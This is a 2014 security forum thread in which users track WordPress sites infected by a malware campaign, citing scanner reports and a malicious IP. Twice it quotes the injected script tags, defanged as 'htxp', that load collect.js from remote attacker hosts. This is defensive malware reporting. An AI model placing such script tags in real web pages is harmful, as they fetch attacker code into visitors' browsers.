polonus
December 21, 2014, 7:31pm
1
See: http://killmalware.com/parix.de/
100/100% malicious: http://zulu.zscaler.com/submission/show/aa04ca39627a89ca655ed8f76212a8a0-1419189704
Offending IP from script on site: http://www.liveipmap.com/122.155.168.105
See: http://www.abuseipdb.com/check/122.155.168.105
The problem → https://wordpress.org/support/topic/mwspamseo-spam-problem
VT does not flag site as such. Detected: http://sitecheck.sucuri.net/results/www.parix.de
Outdated Web Server Apache Found: Apache/2.2.22 2 malicious files: http://quttera.com/detailed_report/www.parix.de
[<script type="text/javascript" src="htxp://122.155.168.105/ads/inpage/pub/collect.js"></script><script type="text/javascript" src="htxp://www.clickevents.com.my/scripts/collect.js"></script>]
pol
Pondus
December 21, 2014, 7:45pm
2
polonus
December 21, 2014, 8:28pm
3
Hi Pondus,
Funny that VT does not alert anything on that massive SoakCloak attack via the contributing engines, while Sucuri flags it,
but mosst users (those with Google Chrome and firefox were protected by Google Safe Browsing: goog-malware-shavar blacklist alert.
More on this malware campaign: http://gizmodo.com/mysterious-russian-malware-is-infecting-over-100-000-wo-1671419522
and for cleansing wesite - https://wordpress.org/plugins/gotmls/ made by Eli.
Revslider was vulnerable as an automatic update was missed.
polonus
polonus
December 21, 2014, 10:29pm
4
Another victim, see: http://killmalware.com/hakukettu.net/
Here VT detects: https://www.virustotal.com/nb/url/ec56b3155ff8ba6a14fb14c00cb5446529758ea720a9723ca115814d658cecf3/analysis/1419200305/
38 files detected: (a.o. wp-content/uploads/2013/04/karimalogo.jpg )
and the now known malware
[<script type="text/javascript" src="htxp://122.155.168.105/ads/inpage/pub/collect.js"></script><script type="text/javascript" src="htxp://www.clickevents.com.my/scripts/collect.js"></script>]
→ Wordpress internal path: /home4/macaman/public_html/hakukettu.net/wp-content/themes/kickstart/index.php
Wordpress Version 3.8 for: htxp://hakukettu.net/wp-includes/js/wp-ajax-response.js
iFrame injected malware: http://labs.sucuri.net/db/malware/mwjs-iframe-injected530?v26
polonus
polonus
December 22, 2014, 12:01am
5
Here we get a right IDS alert: http://urlquery.net/report.php?id=1418927815329 for
" ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers"
The detection is mainly from Google Sfebrowsing: http://t.websitecheck.us/www/hakukettu.net
pol
Pondus
December 22, 2014, 6:47am
6
your first post…
https://www.virustotal.com/en/file/707821fa3e3b5775a1bd462df6ec52aecc5b23a83a4903cc0137833aa89bb96a/analysis/1419264760/
Norman/BlueCoat
Detection has been added on the malicious iframe code in the html file parix.de.htm: Iframe.ABV
Pondus
December 22, 2014, 4:05pm
7